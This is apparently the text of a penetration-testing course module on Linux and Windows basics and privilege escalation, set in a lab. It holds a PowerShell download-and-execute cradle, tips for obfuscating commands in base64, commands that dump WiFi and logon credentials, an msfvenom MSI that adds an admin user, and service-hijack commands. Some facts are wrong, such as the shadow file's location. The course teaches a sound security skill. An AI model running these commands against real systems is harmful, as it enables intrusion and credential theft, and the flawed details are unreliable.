5.

Operating System
Exploitation
Lab Setup

➤ 2 separate machines are required for the below exercises

➤ Make sure that the Parrot VM & Windows 10 VM is ready
➤ Replicate all the exercises step by step for each section.
Linux Basics

➤ Operating System created by Linus Torvalds, a collection of software that

manages h/w resources and provides an environment where application
can run
➤ Majorly used by servers which needs to run continuously without
downtime. However, it supports a small pi to a large server
➤ Free & Open-Source, maintained customized by community as per their
needs
 Linux Family Distribution

Linux Kernel

Debian Fedora SUSE Other

Distributions

Ubuntu RHEL SLES

xUbuntu, OpenSUSE
CentOS Oracle Linux
Linux Mint
etc.
Filesystem types in linux

Majorly there are only most dominant type of filesystem for linux :

➤ Ext2
➤ Ext3
➤ Ext4
Ext2 filesystem

➤ Ext2 stands for second extended file system.

➤ It was introduced in 1993. Developed by Rémy Card.
➤ This was developed to overcome the limitation of the original Ext file
system.
➤ Ext2 does not have journaling feature.
➤ On flash drives, usb drives, ext2 is recommended, as it doesn’t need to do
the over head of journaling.
➤ Maximum individual file size can be from 16 GB to 2 TB
➤ Overall ext2 file system size can be from 2 TB to 32 TB
Ext3 filesystem

➤ Ext3 stands for third extended file system.

➤ It was introduced in 2001. Developed by Stephen Tweedie.
➤ The main benefit of ext3 is that it allows journaling.
➤ Journaling has a dedicated area in the file system, where all the changes
are tracked. When the system crashes, the possibility of file system
corruption is less because of journaling.
➤ Maximum individual file size can be from 16 GB to 2 TB
➤ Overall ext3 file system size can be from 2 TB to 32 TB
➤ You can convert a ext2 file system to ext3 file system directly (without
backup/restore).
Ext4 filesystem

➤ Ext4 stands for fourth extended file system.

➤ It was introduced in 2008.
➤ Supports huge individual file size and overall file system size.
➤ Maximum individual file size can be from 16 GB to 16 TB
➤ Overall maximum ext4 file system size is 1 EB (exabyte). 1 EB = 1024 PB
(petabyte). 1 PB = 1024 TB (terabyte).
➤ Directory can contain a maximum of 64,000 subdirectories (as opposed
to 32,000 in ext3)
➤ You can also mount an existing ext3 fs as ext4 fs (without having to
upgrade it).
FILE hierarchy SYSTEM

In Linux operating system the file hierarchy is maintained by linux foundation

The Filesystem Hierarchy Standard (FHS) defines the directory structure and
directory contents in Unix-like operating systems.

➤ All files and directories appear under the root directory /, even if they are
stored on different physical or virtual devices

➤ Most of these directories exist in all UNIX operating systems and are
generally used in much the same way.
Directory structure

➤ / (Root) : Primary hierarchy root and root directory of the entire file system
hierarchy.
■ Every single file and directory starts from the root directory.
■ Only root user has the right to write under this directory.
■ /root is root user’s home directory, which is not same as / .

➤ /bin : Essential command binaries.

➤ /boot : Boot loader files.
➤ /dev : Essential device files.
➤ /etc : Host-specific system-wide configuration files.
➤ /home : Users’ home directories, containing saved files, personal settings, etc.
➤ /lib : Libraries essential for the binaries in /bin/ and /sbin/.
➤ /media : Mount points for removable media such as CD-ROMs.
➤ /mnt : Temporarily mounted filesystems.
➤ /opt : Optional application software packages.
➤ /sbin : Essential system binaries.
➤ /srv : Site-specific data served by this system, such as data and scripts for
web servers, data offered by FTP servers, and repositories for version control
systems.
➤ /tmp : Temporary files and has world writable permissions.
➤ /usr: Contains binaries, libraries, documentation, and source-code for
second level programs.
➤ /proc : Virtual filesystem providing process and kernel information as files.
Issuing essential commands from command line

In this section we will be learning about how to issue commands from CLI in
terminal. By command line, we mean a text-interface that allow us to enter
commands, execute them and view the results. We can run terminal and a
command line interpreter inside it (called shell). Let’s move on from installation
to using the tools and getting involved in penetration testing.

We can divide commands in 2 categories:

■ System commands
■ Tool commands
System commands in Linux:
System commands are basic commands which are used for a system
administration, these commands are helpful to manage system. Not only in
kali linux system but we can manage another linux system easily by using
these commands for ex: Ubuntu, linux mint, RHEL etc.

➤ “whoami” command:
Command used to know the current user we are logged in.
➤ “pwd” command:
It means “on what location you are” on the linux filesystem hierarchy. The
parent directory is “/” called root directory, inside this the whole filesystem
exists. Also known as present working directory.
➤ “ls” command:
It is used to see files and directories inside a directory. If we want to look up
inside another directory, we have to specify the location.

➤ “cd” command:
It is used for changing the directory.

➤ “mkdir” command:
we all have created a directory in windows GUI. Command line Interface is
the fastest way to operate to operating system.

➤ “cat” command:
Browsing the file system, we find files having contents, cat command is
used to see, edit contents inside a file.
➤ “cp” command:
it is used to copy files and folders from one location to another location.

➤ “rm” command:
It is used to remove files and folders.

➤ “uname” command:
It is used to know the name of your linux machine.”uname” stands for Unix
name, it displays detailed information about the machine name, operating
system and kernel.

➤ “w” command:
To show who is logged in and what they are doing, we use the ‘w’
command. It displays information about logged in users and their respective
processes.
➤ “head” command:
It is used to display the top lines of a file. By default, it display the top 10 line of a
file.

➤ “tail” command:
It is used to display the bottom line of a file. By default, it display the bottom 10 line
of a file.

➤ “ps” command:
It displays the currently running processes in a linux system.

Network commands:
➤ “ifconfig” command:
It is used for network interface configuration (a network interface controller is a
computer hardware that connects a computer to a computer network). It
displays the status of currently active interfaces.
➤ “ping” command:
ping command is used to verify that a device can communicate with another
device on a network. It sends ICMP echo request to other device to check it’s
connectivity.

➤ “wget” command:
wget or webget command is used to download a file directly from the web to the
terminal.

➤ “netstat” command:
print network connections, routing tables and other information about linux
subsystem.

➤ “service” command:
It is to initiate a service, also used to stop check status about a particular service.
➤ Exercises : Exercise 1

■ Execute the above commands strictly in Linux VM environment.

➤ “apt-get” : apt is aptitude the package manager of Debian family .
Therefore, linux also uses the apt package manager for installation of any
tool or command utility from its main repositories.

➤ Mounting a device in Debian linux :

■ Mounting a cdrom device on Debian linux:

mount /dev/cdrom /mnt/cdrom

■ You can always auto mount some file using fstab file present in /etc/
The syntax of a fstab entry is :
[Device] [Mount Point] [File System Type] [Options] [Dump] [Pass]
File Permissions

File Permissions

Read Write Execute

 Numeric File Permission

Number Permission Type

0 No Permission
1 Execute
2 Write
3 Execute + Write
4 Read
5 Read + Execute
6 Read + Write
7 Read + Write + Execute
Changing Entity Permissions

➤ “chmod” command can

be used to change the
permissions of a file or
directory
➤ Syntax
chmod permissions file
Changing Entity Ownership

➤ “chown” command can be

used to change the
ownership of a file or
directory
➤ Syntax
chown <user:group> file
Critical Information in Linux OS

➤ “Passwd” file
■ File located in
“/etc/passwd”
■ It contains sensitive
information like user
account etc
■ It is accessible by a
normal user
■ Attacker can enumerate
all users as well as
privileged users
➤ “Shadow” file
■ File located in
“/etc/passwd”
■ It contains sensitive
information like user
account etc
■ It is accessible by a normal
user
■ Attacker can enumerate all
users as well as privileged
users
➤ Check Running Processes

- “ps -ef” or “ps aux”

- With what Privileges?

- What software?

- With what users?

➤ Check Crontab

- Commands:
“crontab -l”
“ls -la /etc/cron*”

- Scheduled jobs that runs at a

specific duration

- With what Privileges?

- Can that job be modified?

- What is the tasks of the job?

➤ “GTFOBins” for Linux

■ Compiled list of legitimate binaries that can be leveraged by attackers to

perform malicious activities.
Link : https://gtfobins.github.io/
➤ Backups
- Looking for file / storage
backups in the directory will
definitely yield useful
information.
➤ Kernel Exploits
■ Old kernel version have vulnerabilities that can be exploited.
■ Check the version of the kernel
“uname -a” “cat /proc/version”
Windows Basics

➤ Operating System created by Microsoft, a collection of software that

manages h/w resources and provides an environment where application
can run (closed-source)

➤ Provides graphical interface to interact with the file system

➤ Paid & Closed-Source, maintained customized by Microsoft as modified

versions
Filesystem types in Windows

Majorly there are only most dominant type of filesystem for Windows :

➤ New Technology File System (NTFS)

■ Used by recent versions of windows, used to organize data on physical media
■ It allows file compression, means increased storage space on a disk
■ Concept of File Journaling
■ Windows & Linux can Read / Write into the NTFS partitions, however Mac OS X
can only read NTFS formatted drives.

➤ File Allocation Table (FAT)

■ Old file system used majorly in removable storage devices like Smart TVs,
cameras etc
■ The file allocation table is a critical part of the FAT file system. If the FAT is
damaged or lost, the data on the hard disk becomes unreadable.
FILE hierarchy SYSTEM

The Filesystem Hierarchy Standard (FHS) defines the directory structure

and directory contents in Windows operating systems.

➤ All files and directories appear under the drives, even if they are
stored on different physical or virtual devices

➤ Most of these directories exist in all Windows operating systems and

are generally used in much the same way.
 File System

GUI CLI
Issuing essential commands from command line

In this section we will be learning about how to issue commands from CLI in
terminal. By command line, we mean a text-interface that allow us to enter
commands, execute them and view the results. We can run terminal and a
command line interpreter inside it (called shell).

We can divide commands in 2 categories:

➤ System commands
➤ Tool commands
➤ “ipconfig” command:
It is used to see network configuration of a machine.

➤ “cd” command:
It is used for changing the directory.

➤ “mkdir” command:
we all have created a directory in windows GUI. Command line Interface is
the fastest way to operate to operating system.

➤ “type” command:
Browsing the file system, we find files having contents, types command is
used to see, edit contents inside a file.
➤ “netstat” command:
It is used to see list of all active TCP connections from the machine

➤ “ping” command:
It is used for checking the availability of any entity.

➤ “tracert” command:
Visualize the path your internet traffic takes to get from your browser to a
remote servers.

➤ “systeminfo” command:
Provides all the system information
➤ “more” command:
Filter the large output using this command

➤ “schtasks” command:
Used to schedule tasks directly from command line. It is like cronjob in
windows.

➤ “attrib” command:
Change file attributes. For ex : We can hide a visible file.

➤ “netsh” command:
Used to configure or setup the network tasks in a machine.
➤ “net” command:
Provides a wide functionality to interact with network / users etc.

➤ “icalcs” command:
Modify file system permissions

➤ “cls” command:
Clear the screen

➤ “driverquery” command:
List all drivers along with date

➤ “Tasklist” command:
Display all the scheduled tasks
➤ Exercises : Exercise 1

■ Execute the above commands strictly in Windows VM environment.

PowerShell

➤ Powershell is a .NET interpreter by default installed in Windows Operating

System
➤ Used for administration purpose to manage tasks in various OS like
Windows, Linux & MacOS.
➤ Used by threat actors as a in-built tools for exploitation & accessing
resources.
➤ It’s Open Source & platform independent :)
➤ Think of PowerShell like Bash for Linux OS.
➤ It plays a major role in today’s modern attack methodologies.
➤ After all Powershell is a Scripting Language, from running a Windows
command to accessing a .NET class all can be done through the
interactive prompt.
Running Scripts in PowerShell

➤ Execution Policy for scripts in powershell are preconfigured to restricted

mode to block direct execution of remote scripts.

➤ To execute an untrusted PowerShell script, the execution policy is first set to

bypass mode by opening a new powershell session (Temporary method).

“powershell -ep bypass”

DEMO : Setting the PS Execution Policy
Importing Scripts

➤ There are 2 methods to import scripts in powershell:-

1) Dot Sourcing
2) Using Import-Module cmdlet.

➤ Dot Sourcing:- Script will only be loaded in current powershell session, not
in different sessions.
➤ Import-Module cmdlet

This built-in powershell is useful in situations when loading a whole

powershell module (.psm1 or .psd1 files) which contains a bunch of scripts in
it.
DEMO : Manual Dot Sourcing a PS Script
Capabilities of Powershell

1) Port Scanning using Powershell

➤ All of us are familiar with Nmap, Hping & masscan, Right?

➤ In case of hopping from one machine (or network) to another one can
also use built-in powershell hidden feature for port scanning. The
“Test-NetConnection” cmdlet will do this.
➤ Without importing any script we can scan an entire machine. If the
attribute ”TcpTestSucceeded” turns out to be true, Port is open. Cool?

“Test-NetConnection -Port 443 hacknpentest.com”

➤ For detailed information about the target use the following switch:-

“Test-NetConnection -Port 443 hacknpentest.com -InformationLevel

Detailed”

➤ One can write a PowerShell script to scan all ports using this cmdlet.
➤ Exercises :
Exercise 3

■ Scan the TCP Ports of cyberwarfare.live using the previous commands

2) Executing encoded command using PowerShell

Base64 encoded string can also be executed directly in the interactive

session as follows: -

-> $flopster = 'Get-Service'

-> $encodedcommand =
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($flopster))

-> powershell.exe -EncodedCommand $encodedcommand

➤ It’s easy to obfuscate a malicious command using the above technique
during engagements.

➤ However, when the command will decode to execute it can be caught by

Windows Defender.
Living Off the Land ( Direct Memory Execution)

1) iex (New-Object
System.Net.Webclient).DownloadString(‘https://Trusted_Domain/file.p
s1’); function_Name

2) Invoke-WebRequest -UseBasicParsing <URL_name> -Verbose

➤ Using Invoke-Expression the in-memory payload execution is fast as
compared to Invoke-WebRequest.
DEMO : Download & Execute Cradle in PS
➤ Exercises :
Exercise 4

■ Replicate the previous demo in your own local lab.

Critical Information to look in Windows OS

➤ All service

- Enumerate the
permissions on a service

- Use “sc.exe” to query the

service

“sc.exe query"

- “net” command

“net start”
➤ Permissions over a service

- Enumerate the
permissions on a service

- Use “sc.exe” to get info

about the service

“sc.exe qc <service name>”

- Windows Sysinternals
package have
“Accesschk.exe” that is
used to check the service
permissions
➤ Enumerate Users / Groups

- Enumerate all the users in

a machine

- Use “net.exe” to get user

info

“net.exe user"

- Enumerate all groups

“net localgroups”
 Privileged Groups

Administrators Remote Desktop Backup Operators Guests

Users

Users Network Configuration

operators
➤ Privileged Users / Groups
- Groups
“net localgroup
administrators”

➤ Admins have unrestricted

access to the machine
➤ 3rd party Applications

- Check the applications

“dir /a "C:\Program Files"

“dir /a "C:\Program Files
(x86)"

➤ Installed applications have

common
mis-configurations or
sensitive files like logs etc.
➤ Firewall status

- Check the rules

“netsh advfirewall
firewall show rule
name=all"

➤ It will list all the detailed

firewall rules of the
applications that are
present.
➤ WIFI Credentials

- Machines generally uses

WiFi to connect & router to
access internet

“netsh wlan show profile

<SSID> key=clear "

➤ It will provide you the

credentials of wifi stored in
the machine
➤ Windows Logon Credentials

- Machines generally uses WiFi to connect & router to access internet

reg query "HKLM\SOFTWARE\Microsoft\Windows

NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName
DefaultUserName DefaultPassword AltDefaultDomainName
AltDefaultUserName AltDefaultPassword LastUsedUsername”
➤ Windows Credentials
Manager / Windows Vault

- Vault stores credentials for

resources that windows can
log in the users
automatically

“cmdkey /list”

- It stores logon credentials,

RDP creds, web credentials
etc
➤ SAM & System Backups
- Security Accounts Manager
(SAM) is a registry file that
stores users' passwords in a
hashed format
“c:\Windows\System32\
Config\”
- The SYSTEM file is used to
decrypt the passwords
hashes in the SAM file.
- The SAM file is not
accessible directly but
require admin / system
privileges.
DEMO : Extracting credentials using
mimikatz
➤ Exercises : Exercise 4

■ Replicate the previous demo in your own local lab [Windows Machine &
a Payload Server is required]
➤ Exercises :

■ Extracting credentials using PwDump7 [Windows Required]

■ Meterpreter Hashdump Utility [Windows & Attacker Machine Required]

● Take windows meterpreter reverse shell (turn the defenses off)
● Run the hashdump utility (Are you able to successfully dump it, check the
privs)

NOTE : Check the privileges through which the meterpreter shell is taken.
Privilege Escalation

It refers to attain higher privileges by exploiting / abusing

mis-configurations etc

➤ Attackers generally enumerate higher privileged group member like

Administrators, root etc.

➤ There can be multiple ways to escalate to privileged users. Let’s discuss

few of them.
1. Always Install Elevated Misconfig

➤ It is a functionality that offers all users on a windows environment to run

any MSI file with elevated privileges.

➤ Check the following settings:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v

AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v

AlwaysInstallElevated
MisConfig Abuse

➤ Create a malicious MSI installer using msfvenom & execute using

msiexec

msfvenom -p windows/adduser USER=master PASS=Pass@963 -f msi

-o wow.msi

msiexec.exe wow.msi
2. Modifying Service Binary

➤ Modify the binary attached with a service. Tools like accesschk.exe,

subinacl can be used for checking the permissions.

➤ Check the permissions with the following:

sc.exe qc <service_name>
sc.exe –uwcqv “Authenticated Users” *
MisConfig Abuse

➤ Modify the service binary path and then restart it.

sc.exe config <service_name> binpath= “net localgroup

administrators user /add”

sc.exe stop <service_name>

sc.exe start <service_name>

3. Weak Permissions over Service Binary

➤ We can enumerate if we have Modify or Full permissions over any

elevated process.

➤ Check the permissions with the following:

Accesschk.exe –uwdqs “Authenticated Users” <location>

MisConfig Abuse

➤ Replace the legitimate file / folder with a malicious binary

Copy legitimate.exe C:\Public\Tools\legitimate.exe

➤ However, since we do not have permission to restart the service, it would

require a reboot or service restart to execute the malicious binary
4. Unquoted Service Path

➤ If any service path is not quoted correctly, then an attacker would abuse
the scenario.

➤ Example C:\Users\Public Folder\example.exe will be treated as:

C:\Users\Public.exe

➤ List unquoted service paths.

wmic service get name,displayname,pathname,startmode |findstr /i

"Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
MisConfig Abuse

➤ Replace the legitimate file / folder with a malicious binary

C:\Users\Public Folder\example.exe

copy Public.exe C:\Users\

➤ However, since we do not have permission to restart the service, it would

require a reboot or service restart to execute the malicious binary
5. Third Party Application

➤ If any 3rd party application is installed in the machine.

➤ Look for the following path

“C:\Program Files” or “C:\Program Files (x86)”

➤ Enumerate the specific version & check the publically available exploits
6. Custom Application

➤ Understand the functionality of the custom application

➤ What it is doing:
■ Copy pasting to another directory location
■ Transmitting data over network
■ Performing Permission based checks
■ Understand the purpose of the application

➤ Once understood, abuse the functionality

Module 5 : Capstone Project

➤ Create a mindmap for Windows & Linux possible

privilege escalation scenarios as discussed in the
module graphically.

➤ Write a custom script in PowerShell that scans a TCP port

range using “Test-NetConnection”

➤ Complete all the exercises & document the exercises

steps (solutions) in sequence.
 Thank You
For Professional Red Team / Blue Team / Purple Team,
Cloud Cyber Range labs / Courses / Trainings, please contact

[email protected]

To know more about our offerings, please visit:

https://cyberwarfare.live